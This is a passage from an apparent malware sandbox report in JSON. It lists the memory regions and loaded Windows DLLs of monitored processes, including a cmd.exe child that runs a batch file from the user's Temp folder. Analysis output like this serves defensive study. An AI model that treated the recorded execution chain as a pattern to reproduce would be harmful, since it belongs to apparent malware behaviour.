"ref_process_dump": null, "size": 1638400, "start_va": 39256064, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_3818", "name": "private_0x0000000002570000", "norm_filename": null, "region_type": "private_memory", "start_va": 39256064, "timestamp": "00:05:28.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 41222144, "type": "region", "version": 1 }, "end_va": 41484287, "entry_point": 0, "filename": null, "id": "region_3819", "name": "private_0x0000000002750000", "norm_filename": null, "region_type": "private_memory", "start_va": 41222144, "timestamp": "00:05:28.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_3820", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:05:28.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_3821", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:05:28.182", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961422847, "entry_point": 1961033728, "filename": "\\Windows\\SysWOW64\\sxs.dll", "id": "region_3822", "name": "sxs.dll", "norm_filename": "c:\\windows\\syswow64\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:05:28.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1947402240, "type": "region", "version": 1 }, "end_va": 1947480063, "entry_point": 1947402240, "filename": "\\Windows\\SysWOW64\\dwmapi.dll", "id": "region_3823", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\syswow64\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1947402240, "timestamp": "00:05:28.218", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2256895, "entry_point": 0, "filename": null, "id": "region_3824", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:05:28.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2301951, "entry_point": 0, "filename": null, "id": "region_3825", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:05:28.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 41484288, "type": "region", "version": 1 }, "end_va": 45625343, "entry_point": 0, "filename": null, "id": "region_3826", "name": "pagefile_0x0000000002790000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41484288, "timestamp": "00:05:28.224", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 45678592, "type": "region", "version": 1 }, "end_va": 55312383, "entry_point": 45678592, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_3827", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 45678592, "timestamp": "00:05:28.225", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 39256064, "type": "region", "version": 1 }, "end_va": 39780351, "entry_point": 0, "filename": null, "id": "region_3828", "name": "private_0x0000000002570000", "norm_filename": null, "region_type": "private_memory", "start_va": 39256064, "timestamp": "00:05:28.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 40828928, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_3829", "name": "private_0x00000000026f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40828928, "timestamp": "00:05:28.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1990656000, "type": "region", "version": 1 }, "end_va": 2003542015, "entry_point": 1990656000, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_3830", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1990656000, "timestamp": "00:05:29.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1983315968, "type": "region", "version": 1 }, "end_va": 1983672319, "entry_point": 1983315968, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3831", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1983315968, "timestamp": "00:05:29.348", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1969946624, "type": "region", "version": 1 }, "end_va": 1970061311, "entry_point": 1969946624, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_3833", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1969946624, "timestamp": "00:05:37.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1988034560, "type": "region", "version": 1 }, "end_va": 1988059135, "entry_point": 1988034560, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3834", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1988034560, "timestamp": "00:05:37.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970171903, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_3835", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:05:37.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2392063, "entry_point": 0, "filename": null, "id": "region_3836", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:05:37.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1962737664, "type": "region", "version": 1 }, "end_va": 1962811391, "entry_point": 1962737664, "filename": "\\Windows\\SysWOW64\\dhcpcsvc.dll", "id": "region_3837", "name": "dhcpcsvc.dll", "norm_filename": "c:\\windows\\syswow64\\dhcpcsvc.dll", "region_type": "memory_mapped_file", "start_va": 1962737664, "timestamp": "00:05:37.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 2004746240, "type": "region", "version": 1 }, "end_va": 2004963327, "entry_point": 2004746240, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3838", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 2004746240, "timestamp": "00:05:37.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1638400, "start_va": 55312384, "type": "region", "version": 1 }, "end_va": 56950783, "entry_point": 0, "filename": null, "id": "region_3839", "name": "private_0x00000000034c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 55312384, "timestamp": "00:05:37.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_3840", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:05:37.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_3841", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:05:37.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 39780352, "type": "region", "version": 1 }, "end_va": 40828927, "entry_point": 0, "filename": null, "id": "region_3842", "name": "private_0x00000000025f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39780352, "timestamp": "00:05:37.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_3843", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:05:37.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 134217728, "start_va": 56950784, "type": "region", "version": 1 }, "end_va": 191168511, "entry_point": 0, "filename": null, "id": "region_3844", "name": "private_0x0000000003650000", "norm_filename": null, "region_type": "private_memory", "start_va": 56950784, "timestamp": "00:05:37.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4308991, "entry_point": 0, "filename": null, "id": "region_3845", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:05:37.896", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1982070784, "type": "region", "version": 1 }, "end_va": 1983238143, "entry_point": 1982070784, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_3846", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1982070784, "timestamp": "00:05:37.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1983250432, "type": "region", "version": 1 }, "end_va": 1983299583, "entry_point": 1983250432, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_3847", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1983250432, "timestamp": "00:05:37.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1974272000, "type": "region", "version": 1 }, "end_va": 1974292479, "entry_point": 1974272000, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_3848", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 1974272000, "timestamp": "00:05:37.946", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1978793984, "type": "region", "version": 1 }, "end_va": 1979797503, "entry_point": 1978793984, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_3849", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1978793984, "timestamp": "00:05:37.950", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987862527, "entry_point": 1986592768, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_3850", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:05:37.973", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1975779328, "type": "region", "version": 1 }, "end_va": 1977855999, "entry_point": 1975779328, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_3851", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1975779328, "timestamp": "00:05:37.974", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1969815552, "type": "region", "version": 1 }, "end_va": 1969848319, "entry_point": 1969815552, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3852", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1969815552, "timestamp": "00:05:37.980", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1179648, "start_va": 55312384, "type": "region", "version": 1 }, "end_va": 56492031, "entry_point": 0, "filename": null, "id": "region_3853", "name": "private_0x00000000034c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 55312384, "timestamp": "00:05:37.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 56688640, "type": "region", "version": 1 }, "end_va": 56950783, "entry_point": 0, "filename": null, "id": "region_3854", "name": "private_0x0000000003610000", "norm_filename": null, "region_type": "private_memory", "start_va": 56688640, "timestamp": "00:05:37.982", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1969684480, "type": "region", "version": 1 }, "end_va": 1969774591, "entry_point": 1969684480, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_3855", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1969684480, "timestamp": "00:05:37.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4112383, "entry_point": 3866624, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3856", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 3866624, "timestamp": "00:05:37.984", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1969422336, "type": "region", "version": 1 }, "end_va": 1969663999, "entry_point": 1969422336, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_3861", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1969422336, "timestamp": "00:05:37.991", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2494463, "entry_point": 0, "filename": null, "id": "region_3862", "name": "pagefile_0x0000000000260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2490368, "timestamp": "00:05:37.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 0, "filename": null, "id": "region_3972", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:07:38.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_3973", "name": "private_0x0000000000460000", "norm_filename": null, "region_type": "private_memory", "start_va": 4587520, "timestamp": "00:07:38.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 5177343, "entry_point": 0, "filename": null, "id": "region_3974", "name": "private_0x00000000004b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4915200, "timestamp": "00:07:38.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 192217088, "type": "region", "version": 1 }, "end_va": 193265663, "entry_point": 0, "filename": null, "id": "region_3975", "name": "private_0x000000000b750000", "norm_filename": null, "region_type": "private_memory", "start_va": 192217088, "timestamp": "00:07:38.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 193265664, "type": "region", "version": 1 }, "end_va": 194314239, "entry_point": 0, "filename": null, "id": "region_3976", "name": "private_0x000000000b850000", "norm_filename": null, "region_type": "private_memory", "start_va": 193265664, "timestamp": "00:07:38.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_3977", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:07:38.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_3978", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:07:38.032", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\system32\\cmd.exe\" /c \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\upd9dba1b78.bat\"", "filename": "c:\\windows\\syswow64\\cmd.exe", "id": "proc_23", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 23, "origin_monitor_id": 20, "ref_parent_process": { "ref_id": "proc_20", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3863", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3864", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3865", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 589823, "entry_point": 0, "filename": null, "id": "region_3866", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 606207, "entry_point": 0, "filename": null, "id": "region_3867", "name": "pagefile_0x0000000000090000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 589824, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_3868", "name": "pagefile_0x00000000000a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 655360, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_3869", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1246953472, "type": "region", "version": 1 }, "end_va": 1247264767, "entry_point": 1246953472, "filename": "\\Windows\\SysWOW64\\cmd.exe", "id": "region_3870", "name": "cmd.exe", "norm_filename": "c:\\windows\\syswow64\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1246953472, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007826432, "type": "region", "version": 1 }, "end_va": 2009567231, "entry_point": 2007826432, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3871", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007826432, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2009792512, "type": "region", "version": 1 }, "end_va": 2011365375, "entry_point": 2009792512, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3872", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009792512, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3873", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3874", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3875", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3876", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:05:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, 